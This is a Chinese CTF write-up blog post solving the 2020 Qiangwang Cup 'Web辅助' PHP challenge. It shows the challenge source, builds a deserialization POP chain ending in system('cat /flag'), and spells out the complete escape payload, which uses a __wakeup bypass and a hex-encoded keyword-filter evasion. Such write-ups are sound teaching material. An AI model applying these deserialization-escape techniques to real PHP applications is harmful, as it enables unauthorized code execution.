2020第四届强网杯-强网先锋-Web辅助 writeup

最新推荐文章于 2023-02-22 21:26:40 发布
最新推荐文章于 2023-02-22 21:26:40 发布
阅读量1.6k 收藏 4
点赞数
分类专栏: CTF WriteUp 文章标签: 安全 php web 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43531895/article/details/108279135
版权

2020第四届强网杯,强网先锋的Web辅助详解。

原题文件:https://wwe.lanzous.com/i2kYNgnu0sh

本题考查点:

  1. php反序列化
  2. 反序列化字符串逃逸
  3. __wakeup()绕过
  4. 使用16进制绕过关键字过滤。

题目给了源码,先进行代码分析。

在index.php传入get参数username和password后,会使用这两个参数创建player对象。
将player对象序列化后,经过write函数处理,最后写入以访问ip的md5为文件名的文件中,如下。

#index.php
if (isset($_GET['username']) && isset($_GET['password'])){
	$username = $_GET['username'];
	$password = $_GET['password'];
	$player = new player($username, $password);
	file_put_contents("caches/".md5($_SERVER['REMOTE_ADDR']), write(serialize($player))); 
	echo sprintf('Welcome %s, your ip is %s\n', $username, $_SERVER['REMOTE_ADDR']);
}

另外存在文件play.php,访问该文件会读取以访问ip的md5为文件名的文件。
并对其内容经过check函数、read函数处理后反序列化。

#play.php
@$player = unserialize(read(check(file_get_contents("caches/".md5($_SERVER['REMOTE_ADDR'])))));
print_r($player);

在common.php中,可看到write函数是将%00*%00替换为\0*\0,read函数是将\0*\0替换为%00*%00,check函数使文件内容中不能有"name"字符串。

#common.php
function read($data){
    $data = str_replace('\0*\0', chr(0)."*".chr(0), $data);
    return $data;
}
function write($data){
    $data = str_replace(chr(0)."*".chr(0), '\0*\0', $data);
    return $data;
}

function check($data)
{
    if(stristr($data, 'name')!==False){
        die("Name Pass\n");
    }
    else{
        return $data;
    }
}

在class.php文件中定义了几个类,除player外还有topsolo,midsolo,jungle。

#class.php
<?php
class player{
    protected $user;
    protected $pass;
    protected $admin;

    public function __construct($user, $pass, $admin = 0){
        $this->user = $user;
        $this->pass = $pass;
        $this->admin = $admin;
    }

    public function get_admin(){
        return $this->admin;
    }
}

class topsolo{
    protected $name;

    public function __construct($name = 'Riven'){
        $this->name = $name;
    }

    public function TP(){
        if (gettype($this->name) === "function" or gettype($this->name) === "object"){
            $name = $this->name;
            $name();
        }
    }

    public function __destruct(){
        $this->TP();
    }

}

class midsolo{
    protected $name;

    public function __construct($name){
        $this->name = $name;
    }

    public function __wakeup(){
        if ($this->name !== 'Yasuo'){
            $this->name = 'Yasuo';
            echo "No Yasuo! No Soul!\n";
        }
    }
    

    public function __invoke(){
        $this->Gank();
    }

    public function Gank(){
        if (stristr($this->name, 'Yasuo')){
            echo "Are you orphan?\n";
        }
        else{
            echo "Must Be Yasuo!\n";
        }
    }
}

class jungle{
    protected $name = "";

    public function __construct($name = "Lee Sin"){
        $this->name = $name;
    }

    public function KS(){
        system("cat /flag");
    }

    public function __toString(){
        $this->KS();  
        return "";  
    }
}
?>

其中jungle类中的KS方法有cat flag,则我们最终要执行这个方法。
jungle类存在魔术方法__toString(),当该类的对象被当做字符串使用时会调用这个方法,而这个方法会执行KS方法。

Midsolo类中有一个Gank方法,会在该类的name属性中寻找"Yasuo"字符串,此时就将name属性作为了字符串。
因此我们只要将jungle对象赋值给Midsole对象的name属性,就能触发jungle对象的__toString()。
Midsole类中存在魔术方法__invoke(),当该类的对象被作为函数调用时就会调用这个方法,而该方法会调用Gank()方法。

Topsolo类中有TP()方法,该方法检测该类的name属性,当该属性是函数或者对象时就会将该属性作为函数执行。
因此我们只要将midsolo对象赋值给topsolo对象的name属性,就能触发midsolo对象的__invoke()。
该类中的魔术方法__destruct()会在该对象销毁时执行TP()方法,一个对象的生命周期最后总是销毁,因此该方法总是执行的。

通过以上分析,我们构建出经过反序列化就能get flag的payload。

$cat = new jungle();
$mid = new midsolo($cat);
$top = new topsolo(($mid));
$s = serialize($top);
file_put_contents('payload.txt',$s);

得到

在这里插入图片描述
这里的*前后都是%00,因为protected属性经过序列化后会在属性名前加上%00*%00.

然后我们要将这个payload通过username和password参数传入并执行反序列化。

直接通过参数传入会被作为字符串,不会执行反序列化。
要利用read()函数进行字符串逃逸,read函数将\0*\0替换为%00*%00,将5个字符变成3个字符,这样就可以多出两个字符的空间,会将原字符串外的两个字符吞并。
因此我们在username参数传入多个 \0*\0 就可以吞并后面的一些字符。

正常的user类序列化字符串如下:

O:6:“player”:3:{s:7:"%00*%00user";s:3:“123”;s:7:"%00*%00pass";s:3:“123”;s:8:"%00*%00admin";i:0;}

这里我们需要吞并的字符串是

“;s:7:”%00*%00pass";s:151:"a

长度为24,则需要在username传入12个\0*\0。

因为check函数会检查name,因此需要使用16进制绕过。
将序列化字符串中表示变量名为字符串的小写s换为大写S,就可以解析16进制。
n的16进制是 \6e,这里将name换成 \6eame

由于midsolo类中有魔术方法__wakeup(),当反序列化时会执行该方法,将name属性值替换掉。
使序列化字符串中表示对象属性个数的值大于真实的属性个数,就会跳过__wakeup的执行。
因此这里是 O:7:“midsolo”:2:{S。

最终要传入的password参数是

a";s:7:"%00*%00pass";O:7:“topsolo”:1:{S:7:"%00*%00\6eame";O:7:“midsolo”:2:{S:7:"%00*%00\6eame";O:6:“jungle”:1:{S:7:"%00*%00\6eame";s:7:“Lee Sin”;}}};s:8:"%00*%00admin";i:1;}

得到最终的payload为:

username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0a&password=a";s:7:"%00*%00pass";O:7:“topsolo”:1:{S:7:"%00*%00\6eame";O:7:“midsolo”:2:{S:7:"%00*%00\6eame";O:6:“jungle”:1:{S:7:"%00*%00\6eame";s:7:“Lee Sin”;}}};s:8:"%00*%00admin";i:1;}

在index.php传入如上payload,然后访问play.php就可得到flag。

在这里插入图片描述

lnjoy
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ajax跨域实现代码(后台jsp)
10-20
主要介绍了Ajax跨域实现代码(后台jsp),需要的朋友可以参考下
强网杯-强网先锋辅助
、moddemod
01-04 1229
题目描述 flag=open("flag","rb").read() from Crypto.Util.number import getPrime, bytes_to_long import time p=getPrime(1024) q=getPrime(1024) e = 65537 n=p*q m=bytes_to_long(flag) c=pow(m,e,n) print c,e,n ...
2019强网杯crypto writeup
a16511232的博客
05-27 5934
本次write包含以下题目 copperstudy randomstudy 强网先锋-辅助 copperstudy 题目描述 nc 119.3.245.36 12345 连上去返回 [+]proof: skr=os.urandom(8) [+]hashlib.sha256(skr).hexdigest()=1651d7f27f35e8f177633a...
升职加薪必备,2023年程序员不能不知道的AI辅助编码工具
Mr_HelloWorldx的博客
02-22 1830
1、虽然chatGPT的能力让人们惊叹,就AI编码领域来看,它所能提供的帮助还没有被认可,从行业先锋Kite的CEO的告别信中,可以窥知一二。2、AI编码工具是未来趋势,在特定场景下,效果惊艳,是很好的编码助手。3、目前仍旧没有出现统治级别的AI编码工具,每个工具各有所长,个人比较看好GitHub Copilot,因为它拥有天然的代码库来训练AI,不断学习,不断升级。4、国内外的差距巨大,国内甚至很少有公司在做这方面的东西,唏嘘不已。
signature=a7ab3f52fd3143e911ffec68c5ce32d7,2019年强网杯crypto部分题解
weixin_39865625的博客
05-30 6425
一 、random study这个题目中共给出了三个challenge。1. challenge 1服务器将python中的random模块的种子设置为int(time()),然后生成随机数让我们猜,只要我们猜对一次就可以通关了。题目中给了200次机会,应该是考虑到服务器与我们机器的时间不同步的问题(可能相差几秒)。我这里假定服务器时间与本地时间相差不超过10秒,然后对这20种情况进行枚举就好了。...
一些有用的网站
热门推荐
JUNZILIAN的专栏
06-02 1万+
<br />http://csai.cn/<br />硅谷动力(e.net.com.cn)<br />千源网<br />计算机世界<br />计算机报<br />csdn.<br />www.so128.com
Tamevic's Ctf-Crypto writeup@Crypto实验‘RSA’(2019强网杯强网先锋-辅助‘)
Tamevic的博客
06-27 1655
Tamevic’s Ctf-Web writeup@Crypto实验‘RSA’(2019强网杯强网先锋-辅助‘) 还好在课上弥补一下当时比赛最后十分钟差点做出来的遗憾… 题目源码: from Crypto.Util.number import getPrime,bytes_to_long,long_to_bytes import sys from fractions import gcd #...
ajax跨域请求jsp数据
TWO_SHI的博客
05-04 1240
最近的开发中,应工作需要,把java代码在了jsp上,而且还需要通过ajax跨域请求这个方法,并且返回数据。遇到了跨域请求 以及contentType错误,我把我的代码贴出,供大家参考。html页面使用jsonp方式跨域请求(注意:请求的网址?callback=?必须得加上,不懂得请自行搜索jsonp介绍)<title>获取liferay登录信息页面</title> </head> <body> <
Ajax之跨域问题
qq_37630321的博客
03-09 222
跨域问题 跨域:浏览器有一个规定,在不同的域名下访问,Ajax回调函数会被拒绝执行。 跨域常见的解决方案: 1、服务器端在响应头中设置运行跨域即可。(适合小型企业使用) 2、使用jsonp完成跨域。(不建议使用,因为jsonp只支持get请求) 3、搭建网管系统,使用nigix来进行代理。(适合大型企业使用) 4、在本地服务器中,通过httpclient来发送请求,那么浏览器接收数据就是在同一域名...
java/php/net/python守望先锋网站设计
07-28 747
本系统带文档lw万字以上+答辩PPT+查重 如果这个题目不合适,可以去我上传的资源里面找题目,找不到的话,评论留下题目,或者站内私信我, 有时间看到机会给您发 管理员用例图 系统中的核心用户是用户管理员,管理员登录后,通过管理员菜单来管理后台系统。主要功能有:管理员:系统用户管理、新闻数据管理、系统简介设置、用户管理、留言管理、友情链接管理、变幻图管理、视频管理、比赛门票管理、购买门票管理、商品管理、订单管理、战队管理、选手管理、视频统计、商品统计、系统管理等功能。管理员用例如图3-7所示。
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
强网杯 WriteUp By Nu1L
08-02
2022年第六届“强网杯”全国网络安全挑战赛
2018强网杯CTF-题目整理-校本图片Readme.zip
最新发布
12-18
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...
【天格】战队-未解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队-未解出题目附件-第六届“强网杯”全国网络安全挑战赛
强网杯-upload1
08-08
强网杯强网先锋upload题,题目附件是data.pcapng文件直接打开(如果有wireshark软件)通过观察,发现有两个有用的数据包第一个是No. 2打开
2020网鼎杯——you_raise_me_up wp
lnjoy
05-14 2143
2020年第二届网鼎杯,密码学you_raise_me_up, 这道题我们刚开始还以为是个RSA,后来才发现这其实是一个离散对数问题。 原题如下: #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random n = 2 ** 512 m = random.randint(2, n-1) | 1 c = pow(m, bytes_to_long(flag), n) print 'm
WeCTF第一期wp
lnjoy
10-07 1902
web 1.web签到 右键查看源代码即可看到flag wectf{the_iiiis_flag} 2.easy01 进入网页后为 you need get a name! 那就用get方式为name随便传一个参数 http://119.23.236.68:63006/easy/index.php?name=wectf 得到flag wectf{1e2e3c4a5d6c123d456ea...
2020CISCN初赛-crypto-lfsr writeup
lnjoy
09-15 1220
第十三届全国大学生信息安全竞赛初赛,密码学的lfsr详解。 本题考查线性反馈移位寄存器。 初始状态,反馈函数,输出序列都已给出,已知n是100。 输出序列即题给的output.txt。 反馈函数是代码形式,我们需要经过分析后转化为表达式形式。 通过分析反馈函数可以发现,初始状态即是输出序列的前100位倒置。 lfsr源代码如下, def lfsr(state, mask): feedback = state & mask feed_bit = bin(feedback)[2:].co
强网杯-2022 yakagame
11-22
强网杯-2022 yakagame是一个国际性的网络安全竞赛,旨在提高参赛者在网络安全领域的技术能力和解决问题的能力。比赛的目标是通过攻防对抗的方式,测试参赛者在网络攻防、逆向工程、密码学等方面的知识与技能。 在强网杯-2022 yakagame中,参赛者需要分为攻击方和防守方进行对抗。攻击方需要利用各种技术手段,发现并利用防守方系统的漏洞,获取关键信息或直接攻陷目标。防守方则需要搭建并保护其系统,防止攻击方的入侵和渗透。比赛以时间和得分为衡量指标,攻击方所获得的权限越高,扣除的防守方分数就越多。 强网杯-2022 yakagame对参赛者的要求是既要具备扎实的理论知识,又要具备实际操作能力。参赛者需要熟悉并理解各种常见的漏洞类型、攻击技术和防御措施。比赛过程中,参赛者需要快速分析和回应,提供高效的解决方案,同时具备团队合作和应急响应的能力。 参与强网杯-2022 yakagame对于参赛者而言,有助于提升网络安全技术的实际应用能力,了解当前网络安全形势和攻防技术的最新发展,同时也可以结识来自各个国家和地区的网络安全专家和爱好者,进行技术交流和学习。 总之,强网杯-2022 yakagame是一个高水平的网络安全竞赛,为参赛者提供了锻炼和展示自己技术能力的平台,促进了网络安全领域的发展和合作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值